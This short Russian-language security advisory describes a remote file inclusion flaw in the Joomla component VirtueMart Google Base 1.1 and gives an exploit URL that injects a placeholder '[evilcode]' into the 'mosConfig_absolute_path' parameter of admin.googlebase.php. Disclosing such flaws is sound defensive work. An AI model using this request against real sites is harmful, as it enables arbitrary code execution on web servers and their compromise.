Программа: Joomla Component VirtueMart Google Base 1.1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «mosConfig_absolute_path» сценарием
admin.googlebase.php. Удаленный пользователь может выполнить произвольный PHP
сценарий на целевой системе с привилегиями Web сервера.

Эксплоит:

http://localhost/[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=[evilcode]



Оставить мнение